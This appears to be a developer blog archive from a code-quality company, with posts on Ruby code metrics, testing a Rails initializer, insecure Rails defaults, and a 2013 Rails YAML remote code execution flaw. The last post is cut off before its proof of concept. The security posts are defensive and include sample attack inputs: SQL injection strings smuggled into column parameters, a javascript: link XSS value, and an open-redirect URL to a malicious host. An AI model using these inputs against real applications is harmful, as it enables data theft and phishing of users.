Blog Category: Productivity

Deciphering Ruby Code Metrics

Aug 7, 2013

Ruby has a rich ecosystem of code metrics tools, readily available and easy to run on your codebase. Though generating the metrics is simple, interpreting them is complex. This article looks at some Ruby metrics, how they are calculated, what they mean and (most importantly) what to do about them, if anything.

Code metrics fall into two tags: static analysis and dynamic analysis. Static analysis is performed without executing the code (or tests). Dynamic analysis, on the other hand, requires executing the code being measured. Test coverage is a form of dynamic analysis because it requires running the test suite. We’ll look at both types of metrics.

By the way, if you’d rather not worry about the nitty-gritty details of the individual code metrics below, give Code Climate a try. We’ve selected the most important metrics to care about and did all the hard work to get you actionable data about your project within minutes.

Lines of Code

One of the oldest and most rudimentary forms of static analysis is lines of code (LOC). This is most commonly defined as the count of non-blank, non-comment lines of source code. LOC can be looked at on a file-by-file basis or aggregated by module, architecture layer (e.g. the models in an MVC app) or by production code vs. test code.

Rails provides LOC metrics broken down my MVC layer and production code vs. tests via the rake stats command. The output looks something like this:

Lines of code alone can’t tell you much, but it’s usually considered in two ways: overall codebase size and test-to-code ratio. Large, monolithic apps will naturally have higher LOC. Test-to-code ratio can give a programmer a crude sense of the testing practices that have been applied.

Because they are so high level and abstract, don’t work on “addressing” LOC-based metrics directly. Instead, just focus on improvements to maintainability (e.g. decomposing an app into services when appropriate, applying TDD) and it will eventually show up in the metrics.

Complexity

Broadly defined, “complexity” metrics take many forms:

Cyclomatic complexity — Also known as McCabe’s complexity, after its inventor Thomas McCabe, cyclomatic complexity is a count of the linearly independent paths through source code. While his original paper contains a lot of graph-theory analysis, McCabe noted that cyclomatic complexity “is designed to conform to our intuitive notion of complexity”.
The ABC metric — Aggregates the number of assignments, branches and conditionals in a unit of code. The branches portion of an ABC score is very similar to cyclomatic complexity. The metric was designed to be language and style agnostic, which means you could theoretically compare the ABC scores of very different codebases (one in Java and one in Ruby for example).
Ruby’s Flog scores — Perhaps the most popular way to describe the complexity of Ruby code. While Flog incorporates ABC analysis, it is, unlike the ABC metric, opinionated and language-specific. For example, Flog penalizes hard-to-understand Ruby constructs like meta-programming.

For my money, Flog scores seem to do the best job of being a proxy for how easy or difficult a block of Ruby code is to understand. Let’s take a look at how it’s computed for a simple method, based on an example from the Flog website:

def blah # 11.2 total = a = eval "1+1" # 1.2 (a=) + 6.0 (eval) + if a == 2 # 1.2 (if) + 1.2 (==) + 0.4 (fixnum) + puts "yay" # 1.2 (puts) end end

To use Flog on your own code, first install it:

$ gem install flog

Then you can Flog individual files or whole directories. By default, Flog scores are broken out by method, but you can get per-class total by running it with the -goption (group by class):

$ flog app/models/user.rb $ flog -g app/controllers

All of this raises a question: What’s a good Flog score? It’s subjective, of course, but Jake Scruggs, one of the original authors of Metric-Fu, suggested that scores above 20 indicate the method may need refactoring, and above 60 is dangerous. Similarly, Code Climate will flag methods with scores above 25, and considers anything above 60 “very complex”. Fun fact: The highest Flog score ever seen on Code Climate for a single method is 11,354.

If you’d like to get a better sense for Flog scores, take a look at complex classes in some open source projects on Code Climate. Below, for example, is a pretty complex method inside an open source project:

Like most code smells, high complexity is a pointer to a deeper problem rather than a problem in-and-of itself. Tread carefully in your refactorings. Often the simplest solutions (e.g. applying Extract Method) are not the best and rethinking your domain model is required, and sometimes may actually make things worse.

Duplication

Static analysis can also identify identical and similar code, which usually results from copying and pasting. In Ruby, Flay is the most popular tool for duplication detection. It hunts for large, identical syntax trees and also uses fuzzy matching to detect code which differs only by the specific identifiers and constants used.

Let’s take a look at an example of two similar, but not-quite-identical Ruby snippets:

###### From app/models/tickets/lighthouse.rb: def build_request(path, body) Post.new(path).tap do |req| req["X-LighthouseToken"] = @token req.body = body end end ####### From app/models/tickets/pivotal_tracker.rb: def build_request(path, body) Post.new(path).tap do |req| req["X-TrackerToken"] = @token req.body = body end end

The s-expressions produced by RubyParser for these methods are nearly identical, sans the string literal for the token header name, so Flay reports these as:

1) Similar code found in :defn (mass = 78) ./app/models/tickets/lighthouse.rb:25 ./app/models/tickets/pivotal_tracker.rb:25

Running Flay against your project is simple:

$ gem install flay $ flay path/to/rails_app

Some duplications reported by Flay should not be addressed. Identical code is generally worse than similar code, of course, but you also have to consider the context. Remember, the real definition of the Don’t Repeat Yourself (DRY) principle is:

Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

And not:

Don’t type the same characters into the keyboard multiple times.

Simple Rails controllers that follow the REST convention will be similar and show up in Flay reports, but they’re better left damp than introducing a harder-to-understand meta-programmed base class to remove duplication. Remember, code that is too DRY can become chafe, and that’s uncomfortable for everyone.

Test Coverage

One of the most popular code metrics is test coverage. Because it requires running the test suite, it’s actually dynamic analysis rather than static analysis. Coverage is often expressed as a percentage, as in: “The test coverage for our Rails app is 83%.”

Test coverage metrics come in three flavors:

C0 coverage — The percentage of lines of code that have been executed.
C1 coverage — The percentage of branches that have been followed at least once.
C2 coverage — The percentage of unique paths through the source code that have been followed.

C0 coverage is by far the most commonly used metric in Ruby. Low test coverage can tell you that your code in untested, but a high test coverage metric doesn’t guarantee that your tests are thorough. For example, you could theoretically achieve 100% C0 coverage with a single test with no assertions.

To calculate the test coverage for your Ruby 1.9 app, use SimpleCov. It takes a couple steps to setup, but they have solid documentation so I won’t repeat them here.

So what’s a good test coverage percentage? It’s been hotly debated. Some, like Robert Martin, argue that 100% test coverage is a natural side effect of proper development practices, and therefore a bare minimum indicator of quality. DHH put forth an opposing view likening code coverage to security theater and expressly discouraged aiming for 100% code coverage.

Ultimately you need to use your judgement to make a decision that’s right for your team. Different projects with different developers might have different optimal test coverage levels throughout their evolution (even if they are not looking at the metric at all). Tune your sensors to detect pain from under-testing or over-testing and adjust your practices based on pain you’re experiencing.

Suppose that you find yourself with low coverage and are feeling pain as a result. Maybe deploys are breaking the production website every so often. What should you do then? Whole books have been written on this subject, but there are a few tips I’d suggest as a starting point:

Test drive new code.
Don’t backfill unit tests onto non-TDD’ed code. You lose out on the primary benefits of TDD: design assistance. Worse, you can easily end up cementing a poor object design in place.
Start with high level tests (e.g. acceptance tests) to provide confidence the system as a whole doesn’t break as you refactor its guts.
Write failing tests for bugs before fixing them to protect agains regressions. Never fix the same bug twice.

Churn

Churn looks at your source code from a different dimension: the change of your source files over time. I like to express it as a count of the number of times a class has been modified in your version control history. For example: “The User class has a churn of 173.”

By itself, Churn can’t tell you much, but it’s powerful if you mix it with another metric like complexity. Turbulence is a Gem that does just that for Ruby projects. It’s quite easy to use:

$ gem install turbulence $ cd path/to/rails_app && bule

This will spit out a nice report in turbulence/turbulence.html. Here’s an example:

Depending on its complexity and churn, classes fall into one of four quadrants:

Upper-right — Classes with high complexity and high churn. These are good top priorities for refactoring because their maintainability issues are impacting the developers on a regular basis.
Upper-left — Classes with high complexity and low churn. An adapter to hook into a complex third-party system may end up here. It’s complicated, but if no one has to work on (or debug) that code, it’s probably worth leaving as-is for now.
Lower-left — Classes with low churn and low complexity. The best type of classes to have. Most of your code should be in this quadrant.
Lower-right — Classes with low complexity and high churn. Configuration definitions are a prototypical example. Done right, there’s not much to refactor here at all.

Wrapping Up

Ruby is blessed with a rich ecosystem of code metrics tools, and the gems we looked at today just scratch the surface. Generally, the tools are easy to get started with, so it’s worth trying them out and getting a feel for how they match up (or don’t) with your sense of code quality. Use the metrics that prove meaningful to you.

Keep in mind that while these metrics contains a treasure trove of information, they represent only a moment in time. They can tell you where you stand, but less about how you got there and where you’re going. Part of the reason why I built Code Climate is to address this shortcoming. Code Climate allows you to track progress in a meaningful way, raising visibility within your team:

If you’d like to try out code quality metrics on your project quickly and easily, give Code Climate a try. There’s a free two week trial, and I’d love to hear your feedback on how it affects your development process.

There’s a lot our code can tell us about the software development work we are doing. There will always be the need for our own judgement as to how our systems should be constructed, and where risky areas reside, but I hope I’ve shown you how metrics can be a great start to the conversation.

Testing Code in a Rails Initializer

Jul 23, 2013

7 min read

Rails prides itself on sane defaults, but also provides hooks for customizing the framework by providing Ruby blocks in your configuration files. Most of this code begins and ends its life simply and innocuously. Sometimes, however, it grows. Maybe it’s only 3 or 4 lines, but chances are they define important behavior.

Pretty soon, you’re going to want some tests. But while testing models and controllers is a well-established practice, how do you test code that’s tucked away in an initializer? Is there such thing as an initializer test?

No, not really. But that’s ok. Configuration or DSL-style code can trick us into forgetting that we have the full arsenal of Ruby and OO practices at our disposal. Let’s take a look at a common idiom found in initialization code and how we might write a test for it.

Configuring Asset Hosts

Asset host configuration often start as a simple String:

config.action_controller.asset_host = "assets.example.com"

Eventually, as the security and performance needs of your site change, it may grow to:

config.action_controller.asset_host = Proc.new do |*args| source, request = args if request.try(:ssl?) 'ssl.cdn.example.com' else 'cdn%d.example.com' % (source.hash % 4) end end

Rails accepts an asset host Proc which takes two arguments – the path to the source file and, when available, the request object – and returns a computed asset host. What we really want to test here is not the assignment of our Proc to a variable, but the logic inside the Proc. If we isolate it, it’s going to make our lives a bit easier.

Since Rails seems to want a Proc for the asset host, we can provide one. Instead of embedding it in an environment file, we can return one from a method inside an object:

class AssetHosts def configuration Proc.new do |*args| source, request = args if request.try(:ssl?) 'ssl.cdn.example.com' else 'cdn%d.example.com' % (source.hash % 4) end end end end

It’s the exact same code inside the #configuration method, but now we have an object we can test and refactor. To use it, simply assign it to the asset_host config variable as before:

config.action_controller.asset_host = AssetHosts.new.configuration

At this point you may see an opportunity to leverage Ruby’s duck typing, and eliminate the explicit Proc entirely, instead providing an AssetHosts#call method directly. Let’s see how that would work:

class AssetHosts def call(source, request = nil) if request.try(:ssl?) 'ssl.cdn.example.com' else 'cdn%d.example.com' % (source.hash % 4) end end end

Since Rails just expects that the object you provide for the asset_hosts variable respond to the #call interface (like Proc itself does), you can simplify the configuration:

config.action_controller.asset_host = AssetHosts.new

Now lets wrap some tests around AssetHosts. Here’s a first cut:

describe AssetHosts do describe "#call" do let(:https_request) { double(ssl?: true) } let(:http_request) { double(ssl?: false) } context "HTTPS" do it "returns the SSL CDN asset host" do AssetHosts.new.call("image.png", https_request). should == "ssl.cdn.example.com" end end context "HTTP" do it "balances asset hosts between 0 - 3" do asset_hosts = AssetHosts.new asset_hosts.call("foo.png", http_request). should == "cdn1.example.com" asset_hosts.call("bar.png", http_request). should == "cdn2.example.com" end end context "no request" do it "returns the non-ssl asset host" do AssetHosts.new.call("image.png"). should == "cdn0.example.com" end end end end

It’s not magic, but the beauty of first-class objects is they have room to breathe and help present refactorings. In this case, you can apply the Composed Methodpattern to AssetHosts#call.

Guided by tests, you might end up with an object that looks like this:

class AssetHosts def call(source, request = nil) if request.try(:ssl?) https_asset_host else http_asset_host(source) end end private def http_asset_host(source) 'cdn%d.example.com' % cdn_number(source) end def https_asset_host 'ssl.cdn.example.com' end def cdn_number(source) source.hash % 4 end end

Since the external behavior of AssetHosts hasn’t changed, no changes to the tests are required.

By making a small leap – isolating configuration code into an object – we now have logic that is easier to test, read, and change. If you find yourself stuck in a similar situation, with important logic stuck in a place that resists testing, see where a similar leap can lead you.

Rails' Insecure Defaults

Mar 27, 2013

7 min read

13 Security Gotchas You Should Know About

Secure defaults are critical to building secure systems. If a developer must take explicit action to enforce secure behavior, eventually even an experienced developer will forget to do so. For this reason, security experts say:

“Insecure by default is insecure.”

Rails’ reputation as a relatively secure Web framework is well deserved. Out-of-the-box, there is protection against many common attacks: cross site scripting (XSS), cross site request forgery (CSRF) and SQL injection. Core members are knowledgeable and genuinely concerned with security.

However, there are places where the default behavior could be more secure. This post explores potential security issues in Rails 3 that are fixed in Rails 4, as well as some that are still risky. I hope this post will help you secure your own apps, as well as inspire changes to Rails itself.

Rails 3 Issues

Let’s begin by looking at some Rails 3 issues that are resolved in master. The Rails team deserves credit for addressing these, but they are worth noting since many applications will be running on Rails 2 and 3 for years to come.

1. CSRF via Leaky #match Routes

Here is an example taken directly from the Rails 3 generated config/routes.rbfile:

`WebStore::Application.routes.draw do # Sample of named route: match 'products/:id/purchase' => 'catalog#purchase', :as => :purchase # This route can be invoked with # purchase_url(:id => product.id) end`

This has the effect of routing the /products/:id/purchase path to the CatalogController#purchase method for all HTTP verbs (GET, POST, etc). The problem is that Rails’ cross site request forgery (CSRF) protection does not apply to GET requests. You can see this in the method to enforce CSRF protection:

`def verified_request? !protect_against_forgery? || request.get? || form_authenticity_token == params[request_forgery_protection_token] || form_authenticity_token == request.headers['X-CSRF-Token'] end`

The second line short-circuits the CSRF check: it means that if request.get? is true, the request is considered “verified” and the CSRF check is skipped. In fact, in the Rails source there is a comment above this method that says:

Gets should be safe and idempotent.

In your application, you may always use POST to make requests to /products/:id/purchase. But because the router allows GET requests as well, an attacker can trivially bypass the CSRF protection for any method routed via the #match helper. If your application uses the old wildcard route (not recommended), the CSRF protection is completely ineffective.

Best Practice: Don’t use GET for unsafe actions. Don’t use #match to add routes (instead use #post, #put, etc.). Ensure you don’t have wildcard routes.

The Fix: Rails now requires you to specify either specific HTTP verbs or via: :allwhen adding routes with #match. The generated config/routes.rb no longer contains commented out #match routes. (The wildcard route is also removed.)

2. Regular Expression Anchors in Format Validations

Consider the following validation:

`validates_format_of :name, with: /^[a-z ]+$/i`

This code is usually a subtle bug. The developer probably meant to enforce that the entire name attribute is composed of only letters and spaces. Instead, this will only enforce that at least one line in the name is composed of letters and spaces. Some examples of regular expression matching make it more clear:

`>> /^[a-z ]+$/i =~ "Joe User" => 0 # Match >> /^[a-z ]+$/i =~ " '); -- foo" => nil # No match >> /^[a-z ]+$/i =~ "a\n '); -- foo" => 0 # Match`

The developer should have used the \A (beginning of string) and \z (end of string) anchors instead of ^ (beginning of line) and $ (end of line). The correct code would be:

`validates_format_of :name, with: /\A[a-z ]+\z/i`

You could argue that the developer is at fault, and you’d be right. However, the behavior of regular expression anchors is not necessarily obvious, especially to developers who are not considering multiline values. (Perhaps the attribute is only exposed in a text input field, never a textarea.)

Rails is at the right place in the stack to save developers from themselves and that’s exactly what has been done in Rails 4.

Best Practice: Whenver possible, use \A and \z to anchor regular expressions instead of ^ and $.

The Fix: Rails 4 introduces a multiline option for validates_format_of. If your regular expression is anchored using ^ and $rather than \A and \z and you do not pass multiline: true, Rails will raise an exception. This is a great example of creating safer default behavior, while still providing control to override it where necessary.

3. Clickjacking

Clickjacking or “UI redress attacks” involve rendering the target site in an invisible frame, and tricking a victim to take an unexpected action when they click. If a site is vulnerable to clickjacking, an attacker may trick users into taking undesired actions like making a one-click purchase, following someone on Twitter, or changing their privacy settings.

To defend against clickjacking attacks, a site must prevent itself from being rendered in a frame or iframe on sites that it does not control. Older browsers required ugly “frame busting” JavaScripts, but modern browsers support the X-Frame-Options HTTP header which instructs the browser about whether or not it should allow the site to be framed. This header is easy to include, and not likely to break most websites, so Rails should include it by default.

Best Practice: Use the secure_headers RubyGem by Twitter to add an X-Frame-Options header with the value of SAMEORIGIN or DENY.

The Fix: By default, Rails 4 now sends the X-Frame-Options header with the value of SAMEORIGIN:

`X-Frame-Options: SAMEORIGIN`

This tells the browser that your application can only be framed by pages originating from the same domain.

4. User-Readable Sessions

The default Rails 3 session store uses signed, unencrypted cookies. While this protects the session from tampering, it is trivial for an attacker to decode the contents of a session cookie:

`session_cookie = <<-STR.strip.gsub(/\n/, '') BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTkwYThmZmQ3Zm dAY7AEZJIgtzZWtyaXQGO…--4c50026d340abf222… STR Marshal.load(Base64.decode64(session_cookie.split("--")[0])) # => { # "session_id" => "90a8f...", # "_csrf_token" => "iUoXA...", # "secret" => "sekrit" # }`

It’s unsafe to store any sensitive information in the session. Hopefully this is a well known, but even if a user’s session does not contain sensitive data, it can still create risk. By decoding the session data, an attacker can gain useful information about the internals of the application that can be leveraged in an attack. For example, it may be possible to understand which authentication system is in use (Authlogic, Devise, etc.).

While this does not create a vulnerability on its own, it can aid attackers. Any information about how the application works can be used to hone exploits, and in some cases to avoid triggering exceptions or tripwires that could give the developer an early warning an attack is underway.

User-readable sessions violate the Principle of Least Privilege, because even though the session data must be passed to the visitor’s browser, the visitor does not need to be able to read the data.

Best Practice: Don’t put any information into the session that you wouldn’t want an attacker to have access to.

The Fix: Rails 4 changed the default session store to be encrypted. Users can no longer decode the contents of the session without the decryption key, which is not available on the client side.

Unresolved Issues

The remainder of this post covers security risks that are still present in Rails’ at the time of publication. Hopefully, at least some of these will be fixed, and I will update this post if that is the case.

1. Verbose `Server` Headers

The default Rails server is WEBrick (part of the Ruby standard library), even though it is rare to run WEBrick in production. By default, WEBrick returns a verbose Server header with every HTTP response:

`HTTP/1.1 200 OK # … Server: WEBrick/1.3.1 (Ruby/1.9.3/2012-04-20)`

Looking at the WEBrick source, you can see the header is composed with a few key pieces of information:

`"WEBrick/#{WEBrick::VERSION} " + "(Ruby/#{RUBY_VERSION}/#{RUBY_RELEASE_DATE})",`

This exposes the WEBrick version, and also the specific Ruby patchlevel being run (since release dates map to patchlevels). With this information, spray and prey scanners can target your server more effectively, and attackers can tailor their attack payloads.

Best Practice: Avoid running WEBrick in production. There are better servers out there like Passenger, Unicorn, Thin and Puma.

The Fix: While this issue originates in the WEBrick source, Rails should configure WEBrick to use a less verbose Server header. Simply “Ruby” seems like a good choice.

2. Binding to 0.0.0.0

If you boot a Rails server, you’ll see something like this:

`$ ./script/rails server -e production => Booting WEBrick => Rails 3.2.12 application starting in production on http://0.0.0.0:3000`

Rails is binding on 0.0.0.0 (all network interfaces) instead of 127.0.0.1 (local interface only). This can create security risk in both development and production contexts.

In development mode, Rails is not as secure (for example, it renders diagnostic 500 pages). Additionally, developers may load a mix of production data and testing data (e.g. username: admin / password: admin). Scanning for web servers on port 3000 in a San Francisco coffee shop would probably yield good targets.

In production, Rails should be run behind a proxy. Without a proxy, IP spoofing attacks are trivial. But if Rails binds on 0.0.0.0, it may be possible to easily circumvent a proxy by hitting Rails directly depending on the deployment configuration.

Therefore, binding to 127.0.0.1 is a safer default than 0.0.0.0 in all Rails environments.

Best Practice: Ensure your Web server process is binding on the minimal set of interfaces in production. Avoid loading production data on your laptop for debugging purposes. If you must do so, load a minimal dataset and remove it as soon as it’s no longer necessary.

The Fix: Rails already provides a --binding option to change the IP address that the server listens on. The default should be changed from 0.0.0.0 to 127.0.0.1. Developers who need to bind to other interfaces in production can make that change in their deployment configurations.

3. Versioned Secret Tokens

Every Rails app gets a long, randomly-generated secret token in config/initializers/secret_token.rb when it is created with rails new. It looks something like this:

`WebStore::Application.config.secret_token = '4f06a7a…72489780f'`

Since Rails creates this automatically, most developers do not think about it much. But this secret token is like a root key for your application. If you have the secret token, it is trivial to forge sessions and escalate privileges. It is one of the most critical pieces of sensitive data to protect. Encryption is only as good as your key management practices.

Unfortunately, Rails falls flat in dealing with these secret token. The secret_token.rb file ends up checked into version control, and copied to GitHub, CI servers and every developer’s laptop.

Best Practice: Use a different secret token in each environment. Inject it via an ENV var into the application. As an alternative, symlink the production secret token in during deployment.

This Fix: At a minimum, Rails should .gitignore the config/initializers/secret_token.rb file by default. Developers can symlink a production token in place when they deploy or change the initializer to use an ENV var (on e.g. Heroku).

I would go further and propose that Rails create a storage mechanism for secrets. There are many libraries that provide installation instructions involving checking secrets into initializers, which is a bad practice. At the same time, there are at least two popular strategies for dealing with this issue: ENV vars and symlinked initializers.

Rails is in the right place to provide a simple API that developers can depend on for managing secrets, with a swappable backend (like the cache store and session store).

4. Logging Values in SQL Statements

The config.filter_parameters Rails provides is a useful way to prevent sensitive information like passwords from accumulating in production log files. But it does not affect logging of values in SQL statements:

Started POST "/users" for 127.0.0.1 at 2013-03-12 14:26:28 -0400 Processing by UsersController#create as HTML Parameters: {"utf8"=>"✓œ“", "authenticity_token"=>"...", "user"=>{"name"=>"Name", "password"=>"[FILTERED]"}, "commit"=>"Create User"} SQL (7.2ms) INSERT INTO "users" ("created_at", "name", "password_digest", "updated_at") VALUES (?, ?, ?, ?) [["created_at", Tue, 12 Mar 2013 18:26:28 UTC +00:00], ["name", "Name"], ["password_digest", "$2a$10$r/XGSY9zJr62IpedC1m4Jes8slRRNn8tkikn5.0kE2izKNMlPsqvC"], ["updated_at", Tue, 12 Mar 2013 18:26:28 UTC +00:00]] Completed 302 Found in 91ms (ActiveRecord: 8.8ms)

The default Rails logging level in production mode (info) will not log SQL statements. The risk here is that sometimes developers will temporarily increase the logging level in production when debugging. During those periods, the application may write sensitive data to log files, which then persist on the server for a long time. An attacker who gains access to read files on the server could find the data with a simple grep.

Best Practice: Be aware of what is being logged at your production log level. If you increase the log level temporarily, causing sensitive data to be logged, remove that data as soon as it’s no longer needed.

The Fix: Rails could change the config.filter_parameters option into something like config.filter_logs, and apply it to both parameters and SQL statements. It may not be possible to properly filter SQL statements in all cases (as it would require a SQL parser) but there may be an 80/20 solution that could work for standard inserts and updates.

As an alternative, Rails could redact the entire SQL statement if it contains references to the filtered values (for example, redact all statements containing “password”), at least in production mode.

5. Offsite Redirects

Many applications contain a controller action that needs to send users to a different location depending on the context. The most common example is a SessionsController that directs the newly authenticated user to their intended destination or a default destination:

`class SignupsController < ApplicationController def create # ... if params[:destination].present? redirect_to params[:destination] else redirect_to dashboard_path end end end`

This creates the risk that an attacker can construct a URL that will cause an unsuspecting user to be sent to a malicious site after they login:

`https://example.com/sessions/new?destination=http://evil.com/`

Unvalidated redirects can be used for phishing or may damage the users trust in you because it appears that you sent them to a malicious website. Even a vigilant user may not check the URL bar to ensure they are not being phished after their first page load. The issue is serious enough that it has made it into the latest edition of the OWASP Top Ten Application Security Threats.

Best Practice: When passing a hash to #redirect_to, use the only_path: trueoption to limit the redirect to the current host:

`redirect_to params.merge(only_path: true)`

When passing a string, you can parse it an extract the path:

`redirect_to URI.parse(params[:destination]).path`

The Fix: By default, Rails should only allow redirects within the same domain (or a whitelist). For the rare cases where external redirects are intended, the developer should be required to pass an external: true option to redirect_to in order to opt-in to the more risky behavior.

6. Cross Site Scripting (XSS) Via `link_to`

Many developers don’t realize that the HREF attribute of the link_to helper can be used to inject JavaScript. Here is an example of unsafe code:

`<%= link_to "Homepage", user.homepage_url %>`

Assuming the user can set the value of their homepage_url by updating their profile, it creates the risk of XSS. This value:

`user.homepage_url = "javascript:alert('hello')"`

Will generate this HTML:

`<a href="javascript:alert('hello')">Homepage</a>`

Clicking the link will execute the script provided by the attacker. Rails’ XSS protection will not prevent this. This used to be necessary and common before the community migrated to more unobtrusive JavaScript techniques, but is now a vestigial weakness.

Best Practice: Avoid using untrusted input in HREFs. When you must allow the user to control the HREF, run the input through URI.parse first and sanity check the protocol and host.

The Fix: Rails should only allow paths, HTTP, HTTPS and mailto: href values in the link_to helper by default. Developers should have to opt-in to unsafe behavior by passing in an option to the link_to helper, or link_to could simply not support this and developers can craft their links by hand.

7. SQL Injection

Rails does a relatively good job of preventing common SQL injection (SQLi) attacks, so developers may think that Rails is immune to SQLi. Of course, that is not the case. Suppose a developer needs to pull either subtotals or totals off the orderstable, based on a parameter. They might write:

`Order.pluck(params[:column])`

This is not a safe thing to do. Clearly, the user can now manipulate the application to retrieve any column of data from the orders table that they wish. What is less obvious, however, is that the attacker can also pull values from other tables. For example:

`params[:column] = "password FROM users--" Order.pluck(params[:column])`

Will become:

`SELECT password FROM users-- FROM "orders"`

Similarly, the column_name attribute to #calculate actually accepts arbitrary SQL:

`params[:column] = "age) FROM users WHERE name = 'Bob'; --" Order.calculate(:sum, params[:column])`

Will become:

`SELECT SUM(age) FROM users WHERE name = 'Bob'; --) AS sum_id FROM "orders"`

Controlling the column_name attribute of the #calculate method allows the attacker to pull specific values from arbitrary columns on arbitrary tables.

Rails-SQLi.org details which ActiveRecord methods and options permit SQL, with examples of how they might be attacked.

Best Practice: Understand the APIs you use and where they might permit more dangerous operations than you’d expect. Use the safest APIs possible, and whitelist expected inputs.

The Fix: This one is difficult to solve en masse, as the proper solution varies by context. In general, ActiveRecord APIs should only permit SQL fragments where they are commonly used. Method parameters named column_name should only accept column names. Alternative APIs can be provided for developers who need more control.

Hat tip to Justin Collins of Twitter for writing rails-sqli.org which made me aware of this issue.

8. YAML Deserialization

As many Ruby developers learned in January, deserializing untrusted data with YAML is as unsafe as eval. There’s been a lot written about YAML-based attacks, so I won’t rehash it here, but in summary if the attacker can inject a YAML payload, they can execute arbitrary code on the server. The application does not need to do anything other than load the YAML in order to be vulnerable.

Although Rails was patched to avoid parsing YAML sent to the server in HTTP requests, it still uses YAML as the default serialization format for the #serializefeature, as well as the new #store feature (which is itself a thin wrapper around #serialize). Risky code looks like this:

`class User < ActiveRecord::Base # ... serialize :preferences store :theme, accessors: [ :color, :bgcolor ] end`

Most Rails developers would not feel comfortable with storing arbitrary Ruby code in their database, and evaling it when the records are loaded, but that’s the functional equivalent of using YAML deserialization in this way. It violates the Principle of Least Privilege when the stored data does not include arbitrary Ruby objects. Suddenly a vulnerability allowing the writing of a value in a database can be springboarded into taking control of the entire server.

The use of YAML is especially concerning to me as it looks safe but is dangerous. The YAML format was looked at for years by hundreds of skilled developers before the remote code execution (RCE) vulnerability was exposed. While this is top of mind in the Ruby community now, new developers who pick up Rails next year will not have experienced the YAML RCE fiasco.

Best Practice: Use the JSON serialization format instead of YAML for #serializeand #store:

`class User < ActiveRecord::Base serialize :preferences, JSON store :theme, accessors: [ :color, :bgcolor ], coder: JSON end`

The Fix: Rails should switch its default serialization format for ActiveRecord from YAML to JSON. The YAML behavior should be either available by opt-in or extracted into an optional Gem.

9. Mass Assignment

Rails 4 switched from using attr_accessible to deal with mass assignment vulnerabilities to the strongparameters approach. The params object is now an instance of ActionController::Parameters. strongparameters works by checking that instances of Parameters used in mass assignment are “permitted” – that a developer has specifically indicated which keys (and value types) are expected.

In general, this is a positive change, but it does introduce a new attack vector that was not present in the attr_accessible world. Consider this example:

`params = { user: { admin: true }.to_json } # => {:user=>"{\"admin\":true}"} @user = User.new(JSON.parse(params[:user]))`

JSON.parse returns an ordinary Ruby Hash rather than an instance of ActionController::Parameters. With strong_parameters, the default behavior is to allow instances of Hash to set any model attribute via mass assignment. The same issue occurs if you use params from a Sinatra app when accessing an ActiveRecord model – Sinatra will not wrap the Hash in an instance of ActionController::Parameters.

Best Practice: Rely on Rails’ out-of-the-box parsing whenever possible When combining ActiveRecord models with other web frameworks (or deserializing data from caches, queues, etc.) wrap input in ActionController::Parameters so that strong_parameters works.

The Fix: It’s unclear what the best way for Rails to deal with this is. Rails could override deserialization methods like JSON.parse to return instances of ActionController::Parameters but that is relatively invasive and could cause compatibility issues.

A concerned developer could combine strongparameters with `attraccessiblefor highly sensitive fields (likeUser#admin`) for extra protection, but that is likely overkill for most situations. In the end, this may just be a behavior we need to be aware of and look out for.

Hat tip to Brendon Murphy for making me aware of this issue.

Thanks to Adam Baldwin, Justin Collins, Neil Matatell, Noah Davis and Aaron Patterson for reviewing this article.

Rails' Remote Code Execution Vulnerability Explained

Jan 10, 2013

7 min read

We interrupt our regularly scheduled code quality content to raise awareness about a recently-disclosed, critical security vulnerability in Rails.

On Tuesday, a vulnerability was patched in Rails’ Action Pack layer that allows for remote code execution. Since then, a number of proof of concepts have been publicly posted showing exactly how to exploit this issue to trick a remote server into running an attacker’s arbitrary Ruby code.

This post is an attempt to document the facts, raise awareness, and drive organizations to protect their applications and data immediately. Given the presence of automated attack tools, mass scanning for vulnerable applications is likely already in progress.

Vulnerability Summary

An attacker sends a specially crafted XML request to the application containing an embedded YAML-encoded object. Rails’ parses the XML and loads the objects from YAML. In the process, arbitrary Ruby code sent by the attacker may be executed (depending on the type and structure of the injected objects).

Threat Agents: Anyone who is able to make HTTPs request to your Rails application.
Exploitability: Easy — Proof of concepts in the wild require only the URL of the application to attack a Ruby code payload.
Prevalence: Widespread — All Rails versions prior to those released on Tuesday are vulnerable.
Detectability: Easy — No special knowledge of the application is required to test it for the vulnerability, making it simple to perform automated spray-and-pray scans.
Technical Impacts: Severe — Attackers can execute Ruby (and therefore shell) code at the privilege level of the application process, potentially leading to host takeover.
Business Impacts: Severe — All of your data could be stolen and your server resources could be used for malicious purposes. Consider the reputation damage from these impacts.

Step by step:

Rails parses parameters based on the Content-Type of the request. You do not have to be generating XML based responses, calling respond_to or taking any specific action at all for the XML params parser to be used.
The XML params parser (prior to the patched versions) activates the YAML parser for elements with type="yaml". Here’s a simple example of XML embedding YAML: yaml: goes here foo: – 1 – 2
YAML allows the deserialization of arbitrary Ruby objects (providing the class is loaded in the Ruby process at the time of the deserialization), setting provided instance variables.
Because of Ruby’s dynamic nature, the YAML deserialization process itself can trigger code execution, including invoking methods on the objects being deserialized.
Some Ruby classes that are present in all Rails apps (e.g. an ERB template) evaluate arbitrary code that is stored in their instance variables (template source, in the case of ERB).
Evaluating arbitrary Ruby code allows for the execution of shell commands, giving the attacked the full privileges of the user running the application server (e.g. Unicorn) process.

It’s worth noting that any Ruby code which takes untrusted input and processes it with YAML.load is subject to a similar vulnerability (known as “object injection”). This could include third-party RubyGems beyond Rails, or your own application source code. Now is a good time to check for those cases as well.

Proof of Concept

At the suggestion of a member of the Rails team who I respect, I’ve edited this post to withhold some details about how this vulnerability is being exploited. Please be aware however that full, automated exploits are already in the hands of the bad guys, so do not drag your feet on patching.

There are a number of proof of concepts floating around (see the External Links section), but the ones I saw all required special libraries. This is an example based on them with out-of-the-box Ruby (and Rack):

